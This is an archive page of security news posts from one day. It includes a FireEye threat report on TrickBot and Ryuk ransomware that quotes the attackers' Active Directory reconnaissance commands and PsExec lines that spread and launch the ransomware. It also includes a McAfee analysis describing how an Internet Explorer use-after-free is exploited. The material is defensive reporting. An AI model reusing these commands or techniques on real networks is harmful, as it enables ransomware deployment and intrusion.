Daily Archives: January 10, 2019

What is a firewall?

You’ve probably heard the word “firewall” a few times in recent years. There was even a 2006 Hollywood movie of the same name starring Harrison Ford, Paul Bettany and Virginia Madsen.

But what is a firewall, and why do they matter?

Keeping the bad guys out

At the most basic level, a firewall is a system that prevents unauthorised access to a network. The firewall acts like a bouncer at the entrance to the network, checking the identification of everyone who tries to enter. Any unauthorised access attempt is blocked automatically.

How does a firewall work?

Before you can properly understand why firewalls matter, you first need to understand a tiny bit about how data is sent between computers.

Say you email a document to a colleague. Your computer splits the document into tiny pieces called packets which are then sent one at a time to your colleagues computer. Each packet contains additional information that tells the recipient’s computer how to rebuild the document from the packets – and where the packets are coming from. This whole process can be completed in a matter of seconds.

Network data transfers aren’t fool proof though. Packets can get corrupted or lost during transfer. Or they can be intercepted and modified by hackers.

A firewall adds an important layer of protection into the data transfer mechanism. The firewall sits between your computer and the recipient’s, checking every packet that passes through. Any network traffic that has been faked, is coming from an unauthorised or unrecognised source, or is otherwise suspicious is blocked automatically.

The firewall does a lot more besides too. It monitors all network traffic, preventing hackers from breaking into your computer or other internet-connected devices.

Why do firewalls matter?

In a business environment, the firewall is installed at the edge of the network; all network traffic has to pass through the firewall, and is analysed in transit. And the same is true of application firewalls like those included with Panda Dome that are installed on home computers.

Effective network security works on the principle of blocking suspicious traffic before it reaches your computer. In a corporate network, that means stopping hackers before they can access the network. At home, you need to drop/block bad network traffic before it can reach the data stored on your computer.

A firewall is not the same as antivirus – it does not check to see whether incoming packets contain malware. But it does automatically block the most suspicious network traffic to keep criminals out. Like antimalware systems however, a good firewall is also regularly updated so that it is capable of blocking the latest threats and suspicious activities.

And this automated checking is an important tool for raising the overall level of protection for your home computer and data.

To learn more about firewalls, please take a look at the Panda knowledgebase. And if you’d like to protect your computer with a firewall now, please download a free trial of Panda Dome Security.

Download Panda FREE VPN

The post What is a firewall? appeared first on Panda Security Mediacenter.

Big Surveillance in the Big Easy

A push for public safety in New Orleans led to the creation of its Real-Time Crime Center, which is improving relations between citizens, business owners and police, and saving law enforcement thousands of man-hours every year.

If you wanna learn from the IT security blunders committed by hacked hospital group, here’s some weekend reading

Database intrusion should not have succeeded, probe finds, but...

The theft of 1.5 million patient records, including those of Singapore's Prime Minister, from the city state's SingHealth hospital group by hackers could probably have been stopped had the IT department not been so useless, an inquiry has found.…

The Top 5 Vendor-Neutral Cloud Security Certifications of 2019

Many organizations migrate to the cloud because of increased efficiency, data space, scalability, speed and other benefits. But cloud computing comes with its own security threats. To address these challenges, companies should create a hybrid cloud environment, confirm that their cloud security solution offers 24/7 monitoring and multi-layered defenses as well as implement security measures […]… Read More

The post The Top 5 Vendor-Neutral Cloud Security Certifications of 2019 appeared first on The State of Security.

Dozens of .gov HTTPS certs expire, webpages offline, FBI on ice, IT security slows… Yup, it’s day 20 of Trump’s govt shutdown

Hackers may be rubbing their hands with glee

The IT impact of the ongoing partial US federal government shutdown has begun to show up in the form of degraded computer security. According to internet services biz Netcraft, more than 80 TLS certificates used on .gov websites have expired and have not been renewed.…

A Nasty Trick: From Credential Theft Malware to Business Disruption

FireEye is tracking a set of financially-motivated activity referred to as TEMP.MixMaster that involves the interactive deployment of Ryuk ransomware following TrickBot malware infections. These operations have been active since at least December 2017, with a notable uptick in the latter half of 2018, and have proven to be highly successful at soliciting large ransom payments from victim organizations. In multiple incidents, rather than relying solely on built-in TrickBot capabilities, TEMP.MixMaster used EMPIRE and RDP connections to enable lateral movement within victim environments. Interactive deployment of ransomware, such as this, allows an attacker to perform valuable reconnaissance within the victim network and identify critical systems to maximize their disruption to business operations, ultimately increasing the likelihood an organization will pay the demanded ransom. These operations have reportedly netted about $3.7 million in current BTC value.

Notably, while there have been numerous reports attributing Ryuk malware to North Korea, FireEye has not found evidence of this during our investigations. This narrative appears to be driven by code similarities between Ryuk and Hermes, a ransomware that has been used by APT38. However, these code similarities are insufficient to conclude North Korea is behind Ryuk attacks, as the Hermes ransomware kit was also advertised for sale in the underground community at one time.

It is important to note that TEMP.MixMaster is solely a reference to incidents where we have seen Ryuk deployed following TrickBot infections and that not all TrickBot infections will lead to the deployment of Ryuk ransomware. The TrickBot administrator group, which is suspected to be based in Eastern Europe, most likely provide the malware to a limited number of cyber criminal actors to use in operations. This is partially evident through its use of “gtags” that appear to be unique campaign identifiers used to identify specific TrickBot users. In recent incidents investigated by our Mandiant incident response teams, there has been consistency across the gtags appearing in the configuration files of TrickBot samples collected from different victim networks where Ryuk was also deployed. The uniformity of the gtags observed across these incidents appears to be due to instances of TrickBot being propagated via the malware’s worming module configured to use these gtag values.

Currently, we do not have definitive evidence that the entirety of TEMP.MixMaster activity, from TrickBot distribution and operation to Ryuk deployment, is being conducted by a common operator or group. It is also plausible that Ryuk malware is available to multiple eCrime actors who are also using TrickBot malware, or that at least one TrickBot user is selling access to environments they have compromised to a third party.  The intrusion operations deploying Ryuk have also been called GRIM SPIDER.

TrickBot Infection Leading to Ryuk Deployment

The following are a summary of tactics observed across incident response investigations where the use of TrickBot preceded distribution of Ryuk ransomware. Of note, due to the interactive nature of Ryuk deployment, the TTPs leading to its execution can vary across incidents. Furthermore, in at least one case, artifacts related to the execution of TrickBot were collected but there was insufficient evidence to clearly tie observed Ryuk activity to the use of TrickBot.

Initial Infection

The initial infection vector was not confirmed in all incidents; in one case, Mandiant identified that the attackers leveraged a payroll-themed phishing email with an XLS attachment to deliver TrickBot malware (Figure 1). The campaign is documented on this security site. Data from FireEye technologies shows that this campaign was widely distributed primarily to organizations in the United States, and across diverse industries including government, financial services, manufacturing, service providers, and high-tech.

Once a victim opened the attachment and enabled macros, it downloaded and executed an instance of the TrickBot malware from a remote server. Data obtained from FireEye technologies suggests that although different documents may have been distributed by this particular malicious spam run, the URLs from which the documents attempted to retrieve a secondary payload did not vary across attachments or recipients, despite the campaign’s broad distribution both geographically and across industry verticals.

Subject: FW: Payroll schedule
Attachment: Payrollschedule.xls

Pay run summary report and individual payslips.
Kind Regards,
Adam Bush
The contents of this email message and any attachments are intended solely for the addressee(s) and may contain confidential and/or privileged information and may be legally protected from disclosure. If you are not the intended recipient of this message or their agent, or if this message has been addressed to you in error, please immediately alert the sender by reply email and then delete this message and any attachments. If you are not the intended recipient, you are hereby notified that any use, dissemination, copying, or storage of this message or its attachments is strictly prohibited.

Figure 1: Email from a phishing campaign that downloaded TrickBot, which eventually led to Ryuk

Persistence and Lateral Movement

When executed, TrickBot created scheduled tasks on compromised systems to execute itself and ensure persistence following system reboot. These instances of TrickBot were configured to use their network propagation modules (sharedll and tabdll) that rely on SMB and harvested credentials to propagate to additional systems in the network. The number of systems to which TrickBot was propagated varied across intrusions from fewer than ten to many hundreds.

Dwell Time and Post-Exploitation Activity

After a foothold was established by the actors controlling TrickBot, a period of inactivity sometimes followed. Dwell time between TrickBot installation and Ryuk distribution varied across intrusions, but in at least one case may have been as long as a full year. Despite this long dwell time, the earliest reports of Ryuk malware only date back to August 2018. It is likely that actors controlling Trickbot instances used to maintain access to victim environments prior to the known availability of Ryuk were monetizing this access in different ways. Further, due to the suspected human-driven component to these intrusion operations, we would expect to commonly see a delay between initial infection and Ryuk deployment or other post-exploitation activity, particularly in cases where the same initial infection vector was used to compromise multiple organizations simultaneously.

Once activity restarted, the actors moved to interactive intrusion by deploying Empire and/or leveraging RDP connections tunneled through reverse-shells instead of relying on the built-in capabilities of TrickBot to interact with the victim network. In multiple intrusions TrickBot's reverse-shell module (NewBCtestDll) was used to execute obfuscated PowerShell scripts which ultimately downloaded and launched an Empire backdoor.

Variations in Ryuk Deployment Across Engagements

Post exploitation activity associated with each Ryuk incident has varied in historical and ongoing Mandiant incident response engagements. Given that collected evidence suggests Ryuk deployment is managed via human-interactive post-exploitation, variation and evolution in methodology, tools, and approach over time and across intrusions is expected.

The following high-level steps appear common across most incidents into which we have insight:

  • Actors produce a list of targets systems and save it to one or multiple .txt files.
  • Actors move a copy of PsExec, an instance of Ryuk, and one or more batch scripts to one or more domain controllers or other high privilege systems within the victim environment.
  • Actors run batch scripts to copy a Ryuk sample to each host contained in .txt files and ultimately execute them.

Some of the notable ways Ryuk deployment has varied include:

  • In one case, there was evidence suggesting that actors enumerated hosts on the victim network to identify targets for encryption with Ryuk, but in multiple other cases these lists were manually copied to the server that was then used for Ryuk distribution without clear evidence available for how they were produced.
  • There have been multiple cases where TrickBot was deployed broadly across victim environments rather than being used to maintain a foothold on a small number of hosts.
  • We have not identified evidence that Empire was used by the attackers in all cases and sometimes Empire was used to access the victim environment only after Ryuk encryption had started.
  • In one case, the attackers used a variant of Ryuk with slightly different capabilities accompanied by a standalone .bat script containing most of the same taskkill, net, and sc commands normally used by Ryuk to terminate processes and stop services related to anti-virus, backup, and database software.

Example of Ryuk Deployment – Q3 2018

  • Using previously stolen credentials the attacker logged into a domain controller and copied tools into the %TEMP% directory. Copied tools included AdFind.exe (Active Directory enumeration utility), a batch script (Figure 2), and a copy of the 7-Zip archive utility.
  • Downloaded utilities were copied to C:\Windows\SysWOW64\.
  • The attacker performed host and network reconnaissance using built-in Windows commands.
  • AdFind.exe was executed using the previously noted batch script, which was crafted to pass the utility a series of commands that were used to collect information about Active Directory users, systems, OUs, subnets, groups, and trust objects. The output from each command was saved to an individual text file alongside the AdFind.exe utility (Figure 2).
  • This process was performed twice on the same domain controller, 10 hours apart. Between executions of Adfind the attacker tested access to multiple domain controllers in the victim environment, including the one later used to deploy Ryuk.
  • The attacker logged into a domain controller and copied instances of PSExec.exe, a batch script used to kill processes and stop services, and an instance of Ryuk onto the system.
  • Using PsExec the attacker copied the process/service killing batch script to the %TEMP% folder on hundreds of computers across the victim environment, from which it was then executed.
  • The attacker then used PsExec to copy the Ryuk binary to the %SystemRoot% directories of these same computers. A new service configured to launch the Ryuk binary was then created and started.
  • Ryuk execution proceeded as normal, encrypting files on impacted systems.

adfind.exe -f (objectcategory=person) >  <user_list>.txt

adfind.exe -f objectcategory=computer > <computer_list>.txt

adfind.exe -f (objectcategory=organizationalUnit) > <ou_list>.txt

adfind.exe -subnets -f (objectCategory=subnet) > <subnet_list>.txt

adfind.exe -f "(objectcategory=group)" > <group_list>.txt

adfind.exe -gcb -sc trustdmp >  <trustdmp>.txt

Figure 2: Batch script that uses adfind.exe tool to enumerate Active Directory objects

Example of Ryuk Deployment – Q4 2018

  • An instance of the EMPIRE backdoor launched on a system that had been infected by TrickBot. The attacker used EMPIRE’s built-in capabilities to perform network reconnaissance.
  • Attackers connected to a domain controller in the victim network via RDP and copied several files into the host’s C$ share. The copied files included an instance of PsExec, two batch scripts, an instance of the Ryuk malware, and multiple .txt files containing lists of hosts within the victim environment. Many of the targeted hosts were critical systems across the victim environment including domain controllers and other hosts providing key management and authentication services.
  • The attackers then executed the first of these two batch scripts. The executed script used PsExec and hard-coded credentials previously stolen by the actors to copy the Ryuk binary to each host passed as input from the noted .txt files (Figure 3).
  • Attackers then executed the second batch script which iterated through the same host lists and used PsExec to execute the Ryuk binaries copied by the first batch script (Figure 4).

start PsExec.exe @C:\<shared_folder>$\<list>.txt -u <domain>\<username> -p <password> cmd /c COPY "\\<shared_folder>\<ryuk_exe>" "C:\windows\temp\"

Figure 3: Line from the batch file used to copy Ryuk executable to each system

start PsExec.exe -d @C:\<shared_folder>$\<list>.txt -u <domain>\<username> -p <password> cmd /c "C:\windows\temp\<ryuk_exe>"

Figure 4: Line from the batch file used to execute Ryuk on each system

Consistency in TrickBot Group Tags

Each individual TrickBot sample beacons to its Command & Control (C2) infrastructure with a statically defined “gtag” that is believed to act as an identifier for distinct TrickBot customers. There has been significant uniformity in the gtags associated with TrickBot samples collected from the networks of victim organizations.

  • The instance of TrickBot identified as the likely initial infection vector for one intrusion was configured to use the gtag ‘ser0918us’.
    • At the time of distribution, the C2 servers responding to TrickBot samples using the gtag ‘ser0918us’ were sending commands to request that the malware scan victim networks, and then propagate across hosts via the TrickBot worming module.
    • It is possible that in some or all cases instances of TrickBot propagated via the malware’s worming module are configured to use different gtag values, specific to the same TrickBot client, designed to simplify management of implants post-exploitation.
  • A significant proportion of TrickBot samples obtained from the victim environments, including in the case where the infection vector was identified as a sample using gtag ‘ser0918us’, had gtags in the below formats. This may suggest that these gtags are used to manage post-exploitation instances of TrickBot for campaigns distributed via gtag ‘ser0918us’ and other related gtags.
    • libxxx (ex: lib373, lib369, etc)
    • totxxx (ex: tot373, tot369, etc)
    • jimxxx (ex jim373, jim369, etc)
  • The numbers appended to the end of each gtag appear to increment over time, and in some cases multiple samples sharing the same compile time but using different gtags were observed in the same victim environment, though in each of these cases the numbers appended to the end of the gtag matched (e.g. two distinct samples sharing the compile time 2018-12-07 11:28:23 were configured to use the gtags ‘jim371’ and ‘tot371’).
  • The C2 infrastructure hard-coded into these samples overlaps significantly across samples sharing similar gtag values. However, there is also C2 infrastructure overlap between these samples and ones with dissimilar gtag values. These patterns may suggest the use of proxy infrastructure shared across multiple clients of the TrickBot administrator group.


Throughout 2018, FireEye observed an increasing number of cases where ransomware was deployed after the attackers gained access to the victim organization through other methods, allowing them to traverse the network to identify critical systems and inflict maximum damage. SamSam operations, which date back to late 2015, were arguably the first to popularize this methodology and TEMP.MixMaster’s is an example of its growing popularity with threat actors. FireEye Intelligence expects that these operations will continue to gain traction throughout 2019 due the success these intrusion operators have had in extorting large sums from victim organizations.

It is also worth highlighting TEMP.MixMaster’s reliance on TrickBot malware, which is more widely distributed, to gain access to victim organizations. Following indiscriminate campaigns, threat actors can profile victims to identify systems and users of interest and subsequently determine potential monetization strategies to maximize their revenue. Various malware families have incorporated capabilities that can aid in the discovery of high-value targets underscoring the necessity for organizations to prioritize proper remediation of all threats, not only those that initially appear to be targeted.


The authors would like to thank Brice Daniels, Edward Li, Eric Montellese, Sandor Nemes, Eric Scales, Brandan Schondorfer, Martin Tremblay, Isif Ibrahima, Phillip Kealy and Steve Rasch for their contributions to this blog post.

Empowering Security Teams With Threat Intelligence, Automation, and Orchestration

Key Takeaways

  • Security orchestration is the process of automating workflows across an infrastructure of connected applications.
  • When combined with threat intelligence, orchestration can dramatically reduce the human effort required to complete normal security processes such as responding to reported phishing emails, identifying and prioritizing vulnerabilities, and resolving security incidents.
  • Orchestrated incident response leads to faster and more consistent handling of security incidents, reduced reliance on individuals, and a variety of other benefits.
  • The orchestration journey is a long road, but there are significant process and outcome improvements at each stage.
  • Threat intelligence plays a vital role in security orchestration, as it enables automated systems and processes to make decisions (for example, classifying and prioritizing incidents) based on the latest threat insights and data.

Security teams are facing a huge challenge. The volume and complexity of cyberattacks grows every year, and security professionals from all disciplines are being pushed to the limit of their time, skills, and resources.

In recent years, automation and orchestration have become popular with security teams, because (when done properly) they reduce the burden placed on human analysts. So how can organizations begin to improve incident response times and drastically reduce the human effort required to complete security processes?

In this blog, we explain how threat intelligence, automation, and orchestration fit into the security function and what benefits they can provide.

What Is Security Automation and Orchestration?

To kick things off, here are some key definitions:

Automation is the use of technological controls or systems to complete processes that would normally be handled by personnel. While automation was originally limited to simple, repetitive tasks, recent technological advances have made it possible to automate more complex security processes.

Workflows are the step-by-step processes through which a task or series of tasks is completed. In the security world, these are often referred to as “playbooks.”

Finally, orchestration is the process of automating workflows across an infrastructure of connected applications. For example, orchestration in vulnerability management might require API integration of a vulnerability scanner, a threat intelligence solution, and a ticketing system.

When security orchestration is pulled off successfully, it provides a whole host of benefits, including:

  • Freeing human analysts from time-consuming and repetitive tasks
  • Greater consistency in security processes, such as event escalation
  • Quicker results — automated processes are faster than manual processes
  • Reduced staffing and allowing personnel to focus on higher-value tasks

Security Orchestration for Incident Response

Responding to security incidents can be an extremely manual and time-consuming process. In addition to the work required to investigate and remediate an incident, incident response analysts are forced to spend a huge amount of time switching between screens and technologies to access the information and functionality they need to do their jobs.

Naturally, then, security orchestration and automation has potentially huge benefits for incident response teams:

  • Faster Response Times: Orchestrated incident response requires consistent, honed processes, integration across security technologies, and judicious use of automation. This combination enables IT analysts to process incidents in an extremely efficient and consistent manner without needing to repeatedly switch back and forth between technologies.
  • Simpler Workflows: Even the best incident response processes often require complex, multi-step workflows. By automating time-consuming and repetitive tasks, incident response teams can focus their energy on higher-value tasks.
  • Better Cross-Departmental Working: Responding to security incidents often requires input from other departments, like the IT helpdesk, HR, legal, and even marketing or PR. In many cases, automated workflows can drastically improve the process of assigning, tracking, and completing tasks across an organization.
  • Reduced Reliance on Individuals: Even established security teams can expect to see a natural variation in skill levels across different activities. Unfortunately, if you aren’t careful, this can lead to an overreliance on individuals to complete certain incident response tasks. Security orchestration helps mitigate this issue by forcing incident response teams to develop and document strong, consistent processes that help junior personnel develop their skill sets.
  • Enhanced Ability to Identify and Prioritize Serious Threats: When threat intelligence is built into security orchestration, the result is sometimes called “intelligent orchestration.” The inclusion of threat intelligence as part of an API-integrated security function facilitates the automatic identification and prioritization of serious threats, which is crucial in a time-sensitive environment such as incident response.

To understand how an orchestrated incident response function works in practice, consider a simple use case: Your endpoint detection and response (EDR) solution identifies a suspicious process as it attempts to connect to an external server. If such an incident were investigated manually, an analyst would (at the very least) need to:

  • Log a new incident
  • Write and run a SIEM query, pulling all relevant events into a CSV file
  • Identify an MD5 hash for the process and compare it to threat intelligence feeds
  • If the process is confirmed as malicious, create a backup of the affected assets, isolate them from the network, and run an AV scan
  • Update the incident record, attaching all relevant log files

Conservatively, this process could take an analyst 30 minutes to complete, and would need to be done every time a suspicious process is flagged. The orchestrated version of this process — which incorporates threat intelligence and automation — looks similar, but requires almost no input from a human analyst:

  • EDR identifies a suspicious process and an incident is automatically generated
  • The process is compared to threat feeds and prioritized as a serious threat
  • The SIEM is queried, and relevant records are added to the incident
  • IOCs from the incident are compared with threat feeds and confirmed as malicious
  • Based on threat intelligence, the incident is categorized as a malware attack
  • Remediation process begins (creating backups, isolating endpoints, running AV scans)
  • An audit trail is kept automatically

With a version of the process like the one above, if an analyst needs to run additional queries or take further action, they can do so, because they aren’t having to expend all of their time on slow, repetitive processes.

The Evolution of Security Orchestration

While orchestration clearly has applications outside of response-based security disciplines, incident response is a sensible place to start because it’s the point at which most security solutions and processes intersect.

The journey toward a fully orchestrated incident response function is a long road. Fortunately, as each stage of the journey is realized, there are potentially huge advantages in key areas such as improved time taken to detect and respond to security incidents.

Of course, as beneficial as orchestration and automation can be, particularly when combined with threat intelligence, there is one important thing to keep in mind.

Automated and intelligent workflows can dramatically improve efficiency and consistency in security processes, but only if the underlying workflows are well designed. If you move forward with automation and orchestration before you have solid workflows in place, you’ll end up missing things or making serious errors — and nobody will pick them up, because the human element has been removed.

As with all security endeavors, then, it’s important to keep in mind that the order of improvement should be:

People → Processes → Technology

Once you have well-trained personnel and strong processes in place, committing to a program of integration, automation, and orchestration can revolutionize your security program.

The post Empowering Security Teams With Threat Intelligence, Automation, and Orchestration appeared first on Recorded Future.


Google Assistant Is All stacked Up With Loads Of New Features

Google Assistant is all up for going forward and acquiring the latest and to do that it’s absolutely set for providing its users with exceedingly awaited fresh features and integrations.

Some of these features have been on the demand list of Google Assistant’s users. Let’s check out what the fresh integrations and features are.

Interpreter Mode
Helping users to have a conversation in different languages is what Google home devices are all up for. The ‘Interpreter Mode’ will help translate in real-time and will narrate the entire translation out loud; in case of smart displays the text will also be shown on-screen.
Command: “Hey Google, be my Spanish interpreter”

Google Assistant Connect
This is an economic means and a manifesto for manufacturers so that they could add Google Assistant into their products. It is easily expandable to new devices by way of existing smart home platforms.
An e-link is provided which helps to display calendar and weather. The information is delivered via a smart speaker within the house.(already existing)

This program could be accessed by the manufacturers in late 2019.

Google Maps Integration
At last, Google Maps and Google Assistant are shaking hands. Users will now soon be able to convey their Map data such as their ETA to their friends.
Similarly, replying to text messages, adding new destinations, searching for new places on the route and so much more.
Google notes will also be synchronized with Google Assistant.

Flight Check-Ins
The most awaited feature is the flight check-in; via this inclusion, Google Assistant would help the users to easily check into their flights and access boarding passes.
Also the Assistant will send notifications regarding check-ins and other related stuff.
Command: “Hey Google, check into my flight.”

Newly Announced Devices
Google has made some really interesting announcements regarding the latest devices it’s about to launch pretty soon.
Brands like JBL, Anker, Whirlpool, and Verizon are employing Google Assistant in one way or another.
Sonos will also have Assistant pretty soon, especially Sonos Beam and Sonos One. The older models will have the Assistant via an update.
Smart displays, watches, cars and audio devices are a few on the list of devices which will have in a few weeks the Assistant’s assistance.

IE Scripting Flaw Still a Threat to Unpatched Systems: Analyzing CVE-2018-8653

Microsoft recently patched a critical flaw in Internet Explorer’s scripting engine that could lead to remote code execution. The vulnerability is being exploited in the wild and was originally reported by a researcher from Google’s Threat Analysis Group. Microsoft released an out-of-band patch to fix the vulnerability before the normal patch cycle. McAfee products received an update to detect the threat shortly after the patch was released.

A remote attacker can target Internet Explorer Versions 9 through 11 via a specially crafted website, while a local attacker on a rogue network could also target the Web Proxy Auto-Discovery service, which uses the same vulnerable scripting engine (jscript.dll). Microsoft Edge is not affected; however, other Windows applications that include the scripting engine might be vulnerable until the security patch from Microsoft is applied.


Vulnerabilities targeting Internet Explorer that can be triggered either remotely or locally are prime tools for cybercriminals to compromise many unpatched computers. That is why criminals usually integrate those vulnerabilities into exploit kits, which propagate malware or conduct other nefarious activities against compromised hosts. The threat of exploit kits is one reason to track this type of vulnerability and to ensure all security patches are deployed in a timely manner. In 2018, more than 100 memory corruption vulnerabilities were found in a Microsoft scripting engine (either for Internet Explorer or Edge). See the MITRE website for more details. (For defense-in-depth, products such as McAfee Endpoint Security or McAfee Host Intrusion Prevention can detect and eradicate such threats until patches can be applied.)

Once a CVE ID is released, cybercriminals can take as little as a few weeks (or in some cases days) to integrate it into their exploit kit. For example, CVE-2018-8174 was initially reported to Microsoft in late April by two teams of threat researchers who had observed its exploitation in the wild. Microsoft published an advisory within a week, in early May. Meanwhile, the researchers published their security analysis of the exploit. Only two weeks later a proof-of-concept exploit was publicly released. In the next couple of weeks exploit kits RIG and Magnitude integrated their weaponized versions of the exploit. (A more detailed timeline can be found here.)

It took less than a month for cybercriminals to weaponize the vulnerability initially disclosed by Microsoft; therefore, it is critical to understand the threat posed by these attack vectors, and to ensure counter measures are in place to stop the threat before it can do any damage.

Technical details

The IE scripting engine jscript.dll is a code base that has been heavily audited:

It is no surprise that exploitable bugs are becoming more exotic. This is the case for CVE 2018-8653, which takes three seemingly innocent behaviors and turns them into a use-after-free flaw. A Microsoft-specific extension triggers a rarely explored code path that eventually misbehaves and invokes a frequently used function with unusual arguments. This leads to the use-after-free condition that was exploited in the wild.

The enumerator object: The entry point for this vulnerability is a Microsoft-specific extension, the enumerator object. It offers an API to enumerate opaque objects that belong to the Windows world (mostly ActiveX components, such as a file system descriptor used to list drives on a system). However, it can also be called on a JavaScript array. In this situation, one can access the array member as usual, but objects created this way are stored slightly differently in memory. This is the cause of interesting side effects.

The objects created by calling the Enumerator.prototype.item() function are recognized as an ActiveXObject and, as seen in the creation of eObj, we can under certain circumstances overwrite the “prototype” member that should have been a read-only property.

Unexpected side effect: The ability to overwrite the prototype member of an ActiveXObject can seem innocuous at first, but it can be leveraged to explore a code path that should not be reachable.

When using the “instanceof” keyword, we can see that the right side of the keyword expects a function. However, with a specially crafted object, the instanceof call succeeds and, worse, we can control the code being executed.

The edge case of invoking instanceof on a specially crafted ActiveXObject gives us the opportunity to run custom JavaScript code from a callback we control, which is typically an error-prone situation.

Attackers successfully turned this bug into a use-after-free condition, as we shall see next.

Exploiting the bug: Without getting into too much detail (see the proof of concept later in this document for more info), this bug can be turned into a “delete this” type of primitive, which resembles previously reported bugs.
When the callback function (“f” in our previous example) is invoked, the keyword “this” points to eObj.prototype. If we set it to null and then trigger a garbage collection, the memory backing the object can be freed and later reclaimed. However, as mentioned in the Project Zero bug report, to be successful an entire block of variables needs to be cleared before the memory is freed.

The out-of-band patch: Microsoft released an unscheduled patch to fix this vulnerability. It is common practice for us to look at what changed before and after the patch. Interestingly, this patch changes the strict minimum number of bytes, while the version number of the DLL remains unchanged.

Using the popular diffing tool Diaphora, we compared the version of jscript.dll for Windows 10, x64-bit edition (feature version 1809).

We can see that only a few functions were modified. All but one point to array-related functions. Those were probably patches addressing CVE 2018-8631 (jscript!JsArrayFunctionHeapSort out-of-bounds write). The only one remaining that was substantially modified is NameTbl::InvokeInternal.

Diaphora provides us with a diff of the assembly code of the two versions of the function. In this instance, it is easier to compare the functions side by side in Ida Pro to see what has changed. A quick glance toward the end of the function shows the introduction of two calls to GCRoot::~GCRoot (the destructor of the object GCRoot).

Looking at the implementation of ~GCRoot, we see it is the same code as that inlined in that function created by the compiler in the older version of the DLL.

In the newer version of the DLL, this function is called twice; while in the unpatched version, the code was called only once (inlined by the compiler, hence the absence of a function call). In C++ parlance, ~GCRoot is the destructor of GCRoot, so we may want to find the constructor of GCRoot. An easy trick is to notice the magic offset 0x3D0 to see if this value is used anywhere else. We find it near the top of the same function (the unpatched version is on the left):

Diving into the nitty gritty of garbage collection for jscript.dll is beyond the scope of this post, so let’s make some assumptions. In C++/C#, GCRoot would usually design a template to keep track of references pointing to the object being used, so those do not have garbage collection. Here it looks as though we are saving stack addresses (aka local variables) into a list of GCRoot objects to tell the garbage collector not to collect the objects whose pointers are on those specific locations on the stack. In hindsight this makes sense; we were able to “delete this” because “this” was not tracked by the garbage collector, so now Microsoft makes sure to specifically add that stack variable to the tracked elements.

We can verify this hypothesis by tracing the code around an invocation of instanceof. It turns out that just before invoking our custom “isPrototypeOf” callback function, a call to NameTbl::GetVarThis stores a pointer in the newly “protected” stack variable and then invokes ScrFncObj::Call to execute our callback.

Looking at unexpected behavior in `instanceof`: Curious readers might wonder why it is possible to invoke instanceof on a custom object rather than on a function (as described previously). When instanceof is invoked in JavaScript, the CScriptRuntime::InstOf function is called behind the scene. Early on, the function distinguishes two cases. If the variable type is 0x81 (which seems to be a broad type for a JavaScript object on the heap), then it invokes a virtual function that returns true/false if the object can be called. On the other hand, if the type is not 0x81, a different path is followed; it tries to automatically resolve the prototype object and invoke isPrototypeOf.

The 0x81 path:

The not 0x81 path:



Proof of concept

Now that we have seen the ins and outs of the bug, let’s look at a simple proof of concept that exhibits the use-after-free behavior.

First, we set up a couple of arrays, so that everything that can be preallocated is allocated, and the heap is in a somewhat ready state for the use after free.

Then, we declare our custom callback and trigger the vulnerability:

For some reason, the objects array needs to be freed and garbage collected before the next step of the exploit. This could be due to some side effect of freeing the ActiveXObject. The memory is reclaimed when we assign “1” to the property reallocPropertyName. That variable is a magic string that will be copied over the recently freed memory to mimic legitimate variables. It is created as shown:

The 0x0003 is a variable type that tells us the following value is an integer and that 1337 is its value. The string needs to be long enough to trigger an allocation of the same or similar size as the memory block that was recently freed.

To summarize, JavaScript variables (here, the RegExp objects) are stored in a block; when all the variables from the block are freed, the block itself is freed. In the right circumstances, the newly allocated string can take the place of the recently freed block, and because “this” is still dangling in our callback, it can be used for some type confusion. (This is the method used by the attackers, but beyond the scope of this post.) In this example, the code will print 1337 instead of an empty RegExp.

McAfee coverage

Please refer to the McAfee product bulletin for full coverage updates. Here is a short summary of current product coverage as of this writing.

Endpoint products: Endpoint Security (ENS), ENS Adaptive Threat Protection (ENS-ATP), Host Intrusion Prevention (HIPS), VirusScan Enterprise (VSE), WSS.

  • ENS (10.2.0+) with Exploit Prevention
    • Proactively covered by McAfee Generic Buffer Overflow Protection Signature ID 428
  • HIPS (8.0.0+)
    • Proactively covered by McAfee Generic Buffer Overflow Protection Signature ID 428
  • ENS (all versions) and WSS (all versions). Coverage based on samples observed so far. This protection is expected to be expanded over the next few days as viable exploitation attempts are seen.
    • Minimum DAT: V3 DAT (3564)
    • Detection names: Exploit-CVE2018-8653 and Exploit-CVE2018-8653.a
  • VSE (8.8+). Coverage based on samples observed so far. This protection is expected to be expanded over the next few days as viable exploitation attempts are seen.
    • Minimum DAT: V2 DAT (9113)
    • Detection names: Exploit-CVE2018-8653 and Exploit-CVE2018-8653.a

Content summary

  • DATs: V2 DAT (9113), V3 DAT (3564)
  • Generic Buffer Overflow Protection Signature ID 428

MITRE score

The base score (CVSS v3.0) for this vulnerability is 7.5 (High) with an impact score of 5.9 and an exploitability score of 1.6.


CVE-2018-8653 targets multiple versions of Internet Explorer and other applications that rely on the same scripting engine. Attackers can execute arbitrary code on unpatched hosts from specifically crafted web pages or JavaScript files. Even though the bug was recently fixed by Microsoft, we can expect exploit kits to soon deploy a weaponized version of this critical vulnerability, leveraging it to target remaining unpatched systems. The technical analysis in this post should provide enough information for defenders to ensure their systems will withstand the threat and to know which primitives to look for as an entry point for the attack. McAfee security products can be leveraged to provide specific “virtual patching” for this threat until full software patches can be deployed, while current generic buffer overflow protection rules can be used to fingerprint exploit attempts against this and similar vulnerabilities.

The post IE Scripting Flaw Still a Threat to Unpatched Systems: Analyzing CVE-2018-8653 appeared first on McAfee Blogs.

DNS Infrastructure Hijacking Campaign

Original release date: January 10, 2019 | Last revised: January 11, 2019

The National Cybersecurity and Communications Integration Center (NCCIC), part of the Cybersecurity and Infrastructure Security Agency (CISA), is aware of a global Domain Name System (DNS) infrastructure hijacking campaign. Using compromised credentials, an attacker can modify the location to which an organization’s domain name resources resolve. This enables the attacker to redirect user traffic to attacker-controlled infrastructure and obtain valid encryption certificates for an organization’s domain names, enabling man-in-the-middle attacks.

NCCIC encourages administrators to review the FireEye and Cisco Talos Intelligence blogs on global DNS infrastructure hijacking for more information. Additionally, NCCIC recommends the following best practices to help safeguard networks against this threat:

  • Implement multifactor authentication on domain registrar accounts, or on other systems used to modify DNS records.
  • Verify that DNS infrastructure (second-level domains, sub-domains, and related resource records) points to the correct Internet Protocol addresses or hostnames.
  • Search for encryption certificates related to domains and revoke any fraudulently requested certificates.

This product is provided subject to this Notification and this Privacy & Use policy.

Social Security Number scammers are at it again

